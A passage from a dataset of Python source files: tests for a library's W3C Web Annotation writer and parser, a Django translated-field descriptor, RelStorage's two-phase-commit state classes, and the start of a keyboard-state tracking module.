set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n assert 0 == container[\"total\"]\n\n first_page = container[\"first\"]\n assert \"AnnotationPage\" == first_page[\"type\"]\n\n # The page doesn't have a context, since it's in the container.\n assert None == first_page.get('@context')\n\n # The patron doesn't have any annotations yet.\n assert 0 == container['total']\n\n # There's no timestamp since the container is empty.\n assert None == timestamp\n\n # Now, add an annotation.\n identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n annotation.timestamp = utc_now()\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n\n # The context, type, and id stay the same.\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier not in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n\n # But now there is one item.\n assert 1 == container['total']\n\n first_page = container[\"first\"]\n\n assert 1 == len(first_page['items'])\n\n # The item doesn't have a context, since it's in the container.\n first_item = first_page['items'][0]\n assert None == first_item.get('@context')\n\n # The timestamp is the annotation's timestamp.\n assert annotation.timestamp == timestamp\n\n # If the annotation is deleted, the container will be empty again.\n annotation.active = False\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n assert 0 == container['total']\n assert None == timestamp\n\n def test_annotation_container_for_with_identifier(self):\n patron = self._patron()\n identifier = self._identifier()\n\n with self.app.test_request_context(\"/\"):\n container, timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n assert 0 == container[\"total\"]\n\n first_page = container[\"first\"]\n assert \"AnnotationPage\" == first_page[\"type\"]\n\n # The page doesn't have a context, since it's in the container.\n assert None == first_page.get('@context')\n\n # The patron doesn't have any annotations yet.\n assert 0 == container['total']\n\n # There's no timestamp since the container is empty.\n assert None == timestamp\n\n # Now, add an annotation for this identifier, and one for a different identifier.\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n annotation.timestamp = utc_now()\n\n other_annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=self._identifier(),\n motivation=Annotation.IDLING,\n )\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n\n # The context, type, and id stay the same.\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n\n # But now there is one item.\n assert 1 == container['total']\n\n first_page = container[\"first\"]\n\n assert 1 == len(first_page['items'])\n\n # The item doesn't have a context, since it's in the container.\n first_item = first_page['items'][0]\n assert None == first_item.get('@context')\n\n # The timestamp is the annotation's timestamp.\n assert annotation.timestamp == timestamp\n\n # If the annotation is deleted, the container will be empty again.\n annotation.active = False\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n assert 0 == container['total']\n assert None == timestamp\n\n def test_annotation_page_for(self):\n patron = self._patron()\n\n with self.app.test_request_context(\"/\"):\n page = AnnotationWriter.annotation_page_for(patron)\n\n # The patron doesn't have any annotations, so the page is empty.\n assert AnnotationWriter.JSONLD_CONTEXT == page['@context']\n assert 'annotations' in page['id']\n assert 'AnnotationPage' == page['type']\n assert 0 == len(page['items'])\n\n # If we add an annotation, the page will have an item.\n identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron)\n\n assert 1 == len(page['items'])\n\n # But if the annotation is deleted, the page will be empty again.\n annotation.active = False\n\n page = AnnotationWriter.annotation_page_for(patron)\n\n assert 0 == len(page['items'])\n\n def test_annotation_page_for_with_identifier(self):\n patron = self._patron()\n identifier = self._identifier()\n\n with self.app.test_request_context(\"/\"):\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n\n # The patron doesn't have any annotations, so the page is empty.\n assert AnnotationWriter.JSONLD_CONTEXT == page['@context']\n assert 'annotations' in page['id']\n assert identifier.identifier in page['id']\n assert 'AnnotationPage' == page['type']\n assert 0 == len(page['items'])\n\n # If we add an annotation, the page will have an item.\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 1 == len(page['items'])\n\n # If a different identifier has an annotation, the page will still have one item.\n other_annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=self._identifier(),\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 1 == len(page['items'])\n\n # But if the annotation is deleted, the page will be empty again.\n annotation.active = False\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 0 == len(page['items'])\n\n def test_detail_target(self):\n patron = self._patron()\n identifier = self._identifier()\n target = {\n \"http://www.w3.org/ns/oa#hasSource\": {\n \"@id\": identifier.urn\n },\n \"http://www.w3.org/ns/oa#hasSelector\": {\n \"@type\": \"http://www.w3.org/ns/oa#FragmentSelector\",\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n target=json.dumps(target),\n )\n\n with self.app.test_request_context(\"/\"):\n detail = AnnotationWriter.detail(annotation)\n\n assert \"annotations/%i\" % annotation.id in detail[\"id\"]\n assert \"Annotation\" == detail['type']\n assert Annotation.IDLING == detail['motivation']\n compacted_target = {\n \"source\": identifier.urn,\n \"selector\": {\n \"type\": \"FragmentSelector\",\n \"value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n assert compacted_target == detail[\"target\"]\n\n def test_detail_body(self):\n patron = self._patron()\n identifier = self._identifier()\n body = {\n \"@type\": \"http://www.w3.org/ns/oa#TextualBody\",\n \"http://www.w3.org/ns/oa#bodyValue\": \"A good description of the topic that bears further investigation\",\n \"http://www.w3.org/ns/oa#hasPurpose\": {\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }\n }\n\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n content=json.dumps(body),\n )\n\n with self.app.test_request_context(\"/\"):\n detail = AnnotationWriter.detail(annotation)\n\n assert \"annotations/%i\" % annotation.id in detail[\"id\"]\n assert \"Annotation\" == detail['type']\n assert Annotation.IDLING == detail['motivation']\n compacted_body = {\n \"type\": \"TextualBody\",\n \"bodyValue\": \"A good description of the topic that bears further investigation\",\n \"purpose\": \"describing\"\n }\n assert compacted_body == detail[\"body\"]\n\n\nclass TestAnnotationParser(AnnotationTest):\n def setup_method(self):\n super(TestAnnotationParser, self).setup_method()\n self.pool = self._licensepool(None)\n self.identifier = self.pool.identifier\n self.patron = self._patron()\n\n def _sample_jsonld(self, motivation=Annotation.IDLING):\n data = dict()\n data[\"@context\"] = [AnnotationWriter.JSONLD_CONTEXT,\n {'ls': Annotation.LS_NAMESPACE}]\n data[\"type\"] = \"Annotation\"\n motivation = motivation.replace(Annotation.LS_NAMESPACE, 'ls:')\n motivation = motivation.replace(Annotation.OA_NAMESPACE, 'oa:')\n data[\"motivation\"] = motivation\n data[\"body\"] = {\n \"type\": \"TextualBody\",\n \"bodyValue\": \"A good description of the topic that bears further investigation\",\n \"purpose\": \"describing\"\n }\n data[\"target\"] = {\n \"source\": self.identifier.urn,\n \"selector\": {\n \"type\": \"oa:FragmentSelector\",\n \"value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n return data\n\n def test_parse_invalid_json(self):\n annotation = AnnotationParser.parse(self._db, \"not json\", self.patron)\n assert INVALID_ANNOTATION_FORMAT == annotation\n\n def test_invalid_identifier(self):\n # If the target source can't be parsed as a URN we send\n # INVALID_ANNOTATION_TARGET\n data = self._sample_jsonld()\n data['target']['source'] = 'not a URN'\n annotation = AnnotationParser.parse(\n self._db, json.dumps(data), self.patron\n )\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_null_id(self):\n # A JSON-LD document can have its @id set to null -- it's the\n # same as if the @id wasn't present -- but the jsonld library\n # can't handle this, so we need to test it specially.\n self.pool.loan_to(self.patron)\n data = self._sample_jsonld()\n data['id'] = None\n annotation = AnnotationParser.parse(\n self._db, json.dumps(data), self.patron\n )\n assert isinstance(annotation, Annotation)\n\n def test_parse_expanded_jsonld(self):\n self.pool.loan_to(self.patron)\n\n data = dict()\n data['@type'] = [\"http://www.w3.org/ns/oa#Annotation\"]\n data[\"http://www.w3.org/ns/oa#motivatedBy\"] = [{\n \"@id\": Annotation.IDLING\n }]\n data[\"http://www.w3.org/ns/oa#hasBody\"] = [{\n \"@type\" : [\"http://www.w3.org/ns/oa#TextualBody\"],\n \"http://www.w3.org/ns/oa#bodyValue\": [{\n \"@value\": \"A good description of the topic that bears further investigation\"\n }],\n \"http://www.w3.org/ns/oa#hasPurpose\": [{\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }]\n }]\n data[\"http://www.w3.org/ns/oa#hasTarget\"] = [{\n \"http://www.w3.org/ns/oa#hasSelector\": [{\n \"@type\": [\"http://www.w3.org/ns/oa#FragmentSelector\"],\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": [{\n \"@value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }]\n }],\n \"http://www.w3.org/ns/oa#hasSource\": [{\n \"@id\": self.identifier.urn\n }],\n }]\n\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(data[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(data[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_compacted_jsonld(self):\n self.pool.loan_to(self.patron)\n\n data = dict()\n data[\"@type\"] = \"http://www.w3.org/ns/oa#Annotation\"\n data[\"http://www.w3.org/ns/oa#motivatedBy\"] = {\n \"@id\": Annotation.IDLING\n }\n data[\"http://www.w3.org/ns/oa#hasBody\"] = {\n \"@type\": \"http://www.w3.org/ns/oa#TextualBody\",\n \"http://www.w3.org/ns/oa#bodyValue\": \"A good description of the topic that bears further investigation\",\n \"http://www.w3.org/ns/oa#hasPurpose\": {\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }\n }\n data[\"http://www.w3.org/ns/oa#hasTarget\"] = {\n \"http://www.w3.org/ns/oa#hasSource\": {\n \"@id\": self.identifier.urn\n },\n \"http://www.w3.org/ns/oa#hasSelector\": {\n \"@type\": \"http://www.w3.org/ns/oa#FragmentSelector\",\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n\n data_json = json.dumps(data)\n expanded = jsonld.expand(data)[0]\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_jsonld_with_context(self):\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n expanded = jsonld.expand(data)[0]\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_jsonld_with_bookmarking_motivation(self):\n \"\"\"You can create multiple bookmarks in a single book.\"\"\"\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld(motivation=Annotation.BOOKMARKING)\n data_json = json.dumps(data)\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert Annotation.BOOKMARKING == annotation.motivation\n\n # You can't create another bookmark at the exact same location --\n # you just get the same annotation again.\n annotation2 = AnnotationParser.parse(self._db, data_json, self.patron)\n assert annotation == annotation2\n\n # But unlike with IDLING, you _can_ create multiple bookmarks\n # for the same identifier, so long as the selector value\n # (ie. the location within the book) is different.\n data['target']['selector']['value'] = 'epubcfi(/3/4[chap01ref]!/4[body01]/15[para05]/3:10)'\n data_json = json.dumps(data)\n annotation3 = AnnotationParser.parse(self._db, data_json, self.patron)\n assert annotation3 != annotation\n assert 2 == len(self.patron.annotations)\n\n def test_parse_jsonld_with_invalid_motivation(self):\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld()\n data[\"motivation\"] = \"not-a-valid-motivation\"\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_MOTIVATION == annotation\n\n def test_parse_jsonld_with_no_loan(self):\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_parse_jsonld_with_no_target(self):\n data = self._sample_jsonld()\n del data['target']\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_parse_updates_existing_annotation(self):\n self.pool.loan_to(self.patron)\n\n original_annotation, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n original_annotation.active = False\n yesterday = utc_now() - datetime.timedelta(days=1)\n original_annotation.timestamp = yesterday\n\n data = self._sample_jsonld()\n data = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data, self.patron)\n\n assert original_annotation == annotation\n assert True == annotation.active\n assert annotation.timestamp > yesterday\n\n def test_parse_treats_duplicates_as_interchangeable(self):\n self.pool.loan_to(self.patron)\n\n # Due to an earlier race condition, two duplicate annotations\n # were put in the database.\n a1, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n\n a2, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n\n assert a1 != a2\n\n # Parsing the annotation again retrieves one or the other\n # of the annotations rather than crashing or creating a third\n # annotation.\n data = self._sample_jsonld()\n data = json.dumps(data)\n annotation = AnnotationParser.parse(self._db, data, self.patron)\n assert annotation in (a1, a2)\n\n def test_parse_jsonld_with_patron_opt_out(self):\n self.pool.loan_to(self.patron)\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n\n self.patron.synchronize_annotations=False\n annotation = AnnotationParser.parse(\n self._db, data_json, self.patron\n )\n assert PATRON_NOT_OPTED_IN_TO_ANNOTATION_SYNC == annotation\n"} {"ext": "py", "sha": "1a300e2fcaaccd53fb1f1b3fc7df607e9426948c", "content": "from django.utils import translation\n\n\nclass TranslatedField(object):\n def __init__(self, en_field, es_field):\n self.en_field = en_field\n self.es_field = es_field\n\n def __get__(self, instance, owner):\n if translation.get_language() == 'es':\n return getattr(instance, self.es_field)\n else:\n return getattr(instance, self.en_field)\n"} {"ext": "py", "sha": "1a300e54796c2cac920e94e6eb43542d2c9b4bec", "content": "##############################################################################\n#\n# Copyright (c) 2019 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\nTPC protocol state management.\n\nThe various states in which a storage instance can find itself during\ntwo-phase commit are complicated. This package presents a set of\nobjects that encapsulate various possibilities. In this way we can\ntest independent states...independently, and the state transitions are\nexplicit.\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\n\nfrom transaction.interfaces import NoTransaction\nfrom transaction._transaction import rm_key\nfrom transaction import get as get_thread_local_transaction\n\nfrom perfmetrics import statsd_client\n\nfrom zope.interface import implementer\n\nfrom ZODB.POSException import ReadOnlyError\nfrom ZODB.POSException import StorageTransactionError\n\nfrom ..interfaces import ITPCStateNotInTransaction\nfrom ..interfaces import ITPCStateDatabaseAvailable\nfrom ...adapters.connections import ClosedConnection\nfrom ..._util import Lazy as BaseLazy\nfrom ..._util import get_boolean_from_environ\n\nfrom .temporary_storage import TemporaryStorage\n\nlogger = logging.getLogger(__name__)\n\n_CLOSED_CONNECTION = ClosedConnection()\n\n#: Set the ``RELSTORAGE_LOCK_EARLY`` environment variable if you\n#: experience deadlocks or failures to commit (``tpc_finish``). This\n#: will cause the commit lock to be taken as part of ``tpc_vote``\n#: (similar to RelStorage 2.x) instead of deferring it until\n#: ``tpc_finish``.\n#:\n#: If this is necessary, this is probably a bug in RelStorage; please report\n#: it.\nLOCK_EARLY = get_boolean_from_environ(\n 'RELSTORAGE_LOCK_EARLY',\n False,\n logger=logger,\n)\n\n\nclass _LazyResource(BaseLazy):\n\n # If not None, a callable ``(storage, resource, force)``\n # that aborts the *resource*, possibly forcefully (*force*).\n # The return value will be the new value in the object\n # instance.\n abort_function = None\n # If not None, a callable ``(storage, resource)`` to clean up\n # any use of the *resource* after success.\n release_function = None\n\n def _stored_value_for_name_in_inst(self, value, name, inst):\n # type: (Any, str, SharedTPCState) -> None\n if name == 'store_connection':\n # Try to do this first\n inst._used_resources.insert(0, self)\n else:\n inst._used_resources.append(self)\n\n def aborter(self, func):\n assert not isinstance(func, _LazyResource)\n self.abort_function = func\n return self\n\n def releaser(self, func):\n assert not isinstance(func, _LazyResource)\n self.release_function = func\n return self\n\n def cleaner(self, func):\n self.abort_function = self.release_function = func\n return self\n\n\nclass SharedTPCState(object):\n \"\"\"\n Contains attributes marking resources that *might* be used during the commit\n process. If any of them are, then the `abort` method takes care of cleaning them up.\n\n Accessing a resource implicitly begins it, if needed.\n \"\"\"\n\n # pylint:disable=method-hidden\n\n prepared_txn = None\n transaction = None\n not_in_transaction_state = None\n read_only = False # Or we wouldn't allocate this object.\n\n def __init__(self, initial_state, storage, transaction):\n self.initial_state = initial_state\n self._storage = storage\n self.transaction = transaction\n self._used_resources = []\n\n @_LazyResource\n def local_client(self):\n return self._storage._cache.local_client\n\n @_LazyResource\n def store_connection(self):\n conn = self._storage._store_connection_pool.borrow()\n # Report on the connection we will use.\n # https://github.com/zodb/relstorage/issues/460\n logger.info(\"Using store connection %s\", conn)\n return conn\n\n @store_connection.aborter\n def store_connection(self, storage, store_connection, force):\n try:\n adapter = storage._adapter\n if store_connection:\n # It's possible that this connection/cursor was\n # already closed if an error happened (which would\n # release the locks). Don't try to re-open it.\n adapter.locker.release_commit_lock(store_connection.cursor)\n\n # Though, this might re-open it.\n adapter.txncontrol.abort(\n store_connection,\n self.prepared_txn)\n\n if force:\n store_connection.drop()\n finally:\n storage._store_connection_pool.replace(store_connection)\n return _CLOSED_CONNECTION\n\n @store_connection.releaser\n def store_connection(self, storage, store_connection):\n storage._store_connection_pool.replace(store_connection)\n return _CLOSED_CONNECTION\n\n @_LazyResource\n def load_connection(self):\n return self._storage._load_connection\n\n @load_connection.aborter\n def load_connection(self, _storage, load_connection, force):\n if force:\n load_connection.drop()\n else:\n load_connection.rollback_quietly()\n load_connection.exit_critical_phase()\n return _CLOSED_CONNECTION\n\n @load_connection.releaser\n def load_connection(self, _storage, load_connection):\n load_connection.rollback_quietly()\n load_connection.exit_critical_phase()\n return _CLOSED_CONNECTION\n\n @_LazyResource\n def blobhelper(self):\n blobhelper = self._storage.blobhelper\n blobhelper.begin()\n return blobhelper\n\n @blobhelper.aborter\n def blobhelper(self, _storage, blobhelper, _force):\n blobhelper.abort()\n\n @blobhelper.releaser\n def blobhelper(self, _storage, blobhelper):\n blobhelper.clear_temp()\n\n def has_blobs(self):\n # pylint:disable=no-member\n return (\n 'blobhelper' in self.__dict__\n and self.blobhelper is not None\n and self.blobhelper.txn_has_blobs\n )\n\n @BaseLazy\n def cache(self):\n return self._storage._cache\n\n @BaseLazy\n def adapter(self):\n return self._storage._adapter\n\n @_LazyResource\n def temp_storage(self):\n return TemporaryStorage()\n\n @temp_storage.cleaner\n def temp_storage(self, _storage, temp_storage, _force=None):\n temp_storage.close()\n\n def has_temp_data(self):\n return 'temp_storage' in self.__dict__ and self.temp_storage\n\n @_LazyResource\n def _statsd_buf(self):\n return []\n\n @_statsd_buf.cleaner\n def _statds_buf(self, _storage, buf, _force=None):\n client = statsd_client()\n if client is not None and buf:\n client.sendbuf(buf)\n\n def stat_timing(self, stat, value, rate=1):\n \"\"\"\n Record a timing value.\n\n For compatibility with the default settings of ``perfmetrics``,\n the stat name should end in ``.t``\n\n The *value* should be a floating point difference of seconds\n (eg, ``time.time() - time.time()``). This will be converted to an integer\n number of milliseconds (again for consistency with ``perfmetrics``).\n \"\"\"\n client = statsd_client()\n if client is not None:\n # scale from float seconds to milliseconds\n value = int(value * 1000.0)\n client.timing(stat, value, rate, self._statsd_buf)\n\n def stat_count(self, stat, value, rate=1):\n client = statsd_client()\n if client is not None:\n client.incr(stat, value, rate, self._statsd_buf)\n\n def __cleanup(self, method_name, method_args):\n storage = self._storage\n resources = self._used_resources\n self._used_resources = () # No more opening resources.\n\n exceptions = []\n\n for resource in resources:\n assert resource.__name__ in vars(self)\n\n cleaner = getattr(resource, method_name)\n if not cleaner:\n setattr(self, resource.__name__, None)\n continue\n\n value = getattr(self, resource.__name__)\n new_value = None\n try:\n new_value = cleaner(self, storage, value, *method_args)\n except Exception as ex: # pylint:disable=broad-except\n exceptions.append(ex)\n setattr(self, resource.__name__, new_value)\n\n if exceptions: # pragma: no cover\n # This usually indicates a bug in RelStorage that should be fixed.\n raise Exception(\"Failed to close one or more resources: %s\" % (exceptions,))\n\n def abort(self, force=False):\n self.__cleanup('abort_function', (force,))\n\n def release(self):\n self.__cleanup('release_function', ())\n\n\n@implementer(ITPCStateDatabaseAvailable)\nclass AbstractTPCStateDatabaseAvailable(object):\n\n __slots__ = (\n 'shared_state',\n )\n\n # - store\n # - restore/restoreBlob\n # - deleteObject\n # - undo\n\n # should raise ReadOnlyError if the storage is read only.\n\n # - tpc_vote should raise StorageTransactionError\n\n # Because entering tpc_begin wasn't allowed if the storage was\n # read only, this needs to happen in the \"not in transaction\"\n # state.\n\n def __init__(self, shared_state):\n self.shared_state = shared_state # type: SharedTPCState\n\n @property\n def transaction(self):\n return self.shared_state.transaction\n\n @property\n def initial_state(self):\n return self.shared_state.initial_state\n\n @property\n def store_connection(self):\n return self.shared_state.store_connection\n\n def __repr__(self):\n result = \"<%s at 0x%x stored_count=%s %s\" % (\n type(self).__name__,\n id(self),\n len(getattr(self, 'temp_storage', ()) or ()),\n self._tpc_state_transaction_data(),\n )\n\n extra = self._tpc_state_extra_repr_info()\n for k, v in extra.items():\n result += ' %s=%r' % (k, v)\n result += '>'\n return result\n\n def _tpc_state_extra_repr_info(self):\n return {}\n\n def _tpc_state_transaction_data(self):\n # Grovels around in the transaction object and tries to find interesting\n # things to include.\n\n # The ZODB Connection passes us an internal TransactionMetaData\n # object; the real transaction object stores a reference to that in its data,\n # keyed off the connection.\n # We may or may not be able to get the real transaction using transaction.get(),\n # depending on if we are using the global (thread local) transaction manager or not.\n try:\n global_tx = get_thread_local_transaction()\n except NoTransaction:\n # It's in explicit mode and we're not using it.\n return \" tx=%r\" % (self.transaction,)\n\n tx_data = getattr(global_tx, '_data', None)\n if not tx_data:\n # No data stored on the transaction (or the implementation changed!)\n return \" tx=%r\" % (self.transaction,)\n\n for v in tx_data.values():\n if v is self.transaction:\n # Yes, we found the metadata that ZODB uses, so we are\n # joined to this transaction.\n break\n else:\n return \" tx=%r\" % (tx_data, self.transaction,)\n\n resources = sorted(global_tx._resources, key=rm_key)\n return \"transaction=%r resources=%r\" % (global_tx, resources)\n\n def tpc_finish(self, storage, transaction, f=None, _time=None): # pylint:disable=unused-argument\n # For the sake of some ZODB tests, we need to implement this everywhere,\n # even if it's not actually usable, and the first thing it needs to\n # do is check the transaction.\n if transaction is not self.transaction:\n raise StorageTransactionError('tpc_finish called with wrong transaction')\n raise NotImplementedError(\"tpc_finish not allowed in this state.\")\n\n def tpc_begin(self, _storage, transaction):\n # Ditto as for tpc_finish\n raise StorageTransactionError('tpc_begin not allowed in this state', type(self))\n\n def tpc_abort(self, transaction, force=False):\n if not force:\n if transaction is not self.transaction:\n return self\n\n self.shared_state.abort(force)\n return self.initial_state\n\n def no_longer_stale(self):\n return self\n\n def stale(self, e):\n return Stale(self, e)\n\n def close(self):\n if self.shared_state is not None:\n self.tpc_abort(None, True)\n self.shared_state = None\n\n\n@implementer(ITPCStateNotInTransaction)\nclass NotInTransaction(object):\n # The default state, when the storage is not attached to a\n # transaction.\n\n __slots__ = (\n 'last_committed_tid_int',\n 'read_only',\n 'begin_factory',\n )\n\n transaction = None\n\n def __init__(self, begin_factory, read_only, committed_tid_int=0):\n self.begin_factory = begin_factory\n self.read_only = read_only\n self.last_committed_tid_int = committed_tid_int\n\n def with_committed_tid_int(self, committed_tid_int):\n return NotInTransaction(\n self.begin_factory,\n self.read_only,\n committed_tid_int\n )\n\n def tpc_abort(self, *args, **kwargs): # pylint:disable=arguments-differ,unused-argument,signature-differs\n # Nothing to do\n return self\n\n def _no_transaction(self, *args, **kwargs):\n raise StorageTransactionError(\"No transaction in progress\")\n\n tpc_finish = tpc_vote = _no_transaction\n checkCurrentSerialInTransaction = _no_transaction\n\n def store(self, *_args, **_kwargs):\n if self.read_only:\n raise ReadOnlyError()\n self._no_transaction()\n\n restore = deleteObject = undo = restoreBlob = store\n\n def tpc_begin(self, storage, transaction): # XXX: Signature needs to change.\n if self.read_only:\n raise ReadOnlyError()\n if transaction is self.transaction: # Also handles None.\n raise StorageTransactionError(\"Duplicate tpc_begin calls for same transaction.\")\n state = SharedTPCState(self, storage, transaction)\n try:\n return self.begin_factory(state)\n except:\n state.abort()\n raise\n\n @property\n def initial_state(self):\n return self\n\n # This object appears to be false.\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n def close(self):\n pass\n\n\n@implementer(ITPCStateNotInTransaction)\nclass Stale(object):\n \"\"\"\n An error that lets us know we are stale\n was encountered.\n\n Just about all accesses to this object result in\n re-raising that error.\n \"\"\"\n\n transaction = None\n last_committed_tid_int = 0\n\n def __init__(self, previous_state, stale_error):\n self.previous_state = previous_state\n self.stale_error = stale_error\n\n def _stale(self, *args, **kwargs):\n raise self.stale_error\n\n store = restore = checkCurrentSerialInTransaction = _stale\n undo = deleteObject = restoreBlob = _stale\n tpc_begin = tpc_finish = tpc_vote = _stale\n\n def tpc_abort(self, *args, **kwargs):\n return self.previous_state.tpc_abort(*args, **kwargs)\n\n @property\n def initial_state(self):\n return self.previous_state.initial_state\n\n def no_longer_stale(self):\n return self.previous_state\n\n def stale(self, _e):\n return self\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n"} {"ext": "py", "sha": "1a300feeb1489d80c5e1aa38555ac20a50c24d8e", "content": "from .json_data_provider import *\n"} {"ext": "py", "sha": "1a3011922de5be60416538f7f831f8861157210d", "content": "\nIGNORED = None\nACTION_PENDING = 1\n\n# Bigger than necessary\n_MAX_VK_KEY = 0x200\n_VK_KEY_MASK = 0x1ff\n_CURRENT_KEY_STATE = [False] * _MAX_VK_KEY\n_MODIFIERS = set()\n\n\ndef on_key_hook(vk_code, is_down, special_modifier_state = None):\n \"\"\"\n Module-wide storage for the current key state.\n\n :param vk_code:\n :param is_down:\n :param special_modifier_state: map of vcodes to the up/down state\n (True == is_down, False == !is_down). This is part of the\n windows key state / locked desktop work-around.\n :return: True if it's a recognized key, False if it isn't known.\n \"\"\"\n if special_modifier_state is not None:\n for k, v in special_modifier_state.items():\n if k != vk_code and k in _MODIFIER_KEYS:\n if _CURRENT_KEY_STATE[k] != v:\n print(\"DEBUG modifier {0} does not match inner state.\".format(k))\n if k in _MODIFIER_KEYS:\n if is_down:\n _MODIFIERS.add(k)\n else:\n _MODIFIERS.remove(k)\n _CURRENT_KEY_STATE[k] = v\n if 0 <= vk_code <= _MAX_VK_KEY:\n _CURRENT_KEY_STATE[vk_code] = is_down\n if vk_code in _MODIFIER_KEYS:\n if is_down:\n _MODIFIERS.add(vk_code)\n else:\n _MODIFIERS.remove(vk_code)\n return True\n return False\n\n\nclass KeyOverride(object):\n \"\"\"\n Captures all key presses. 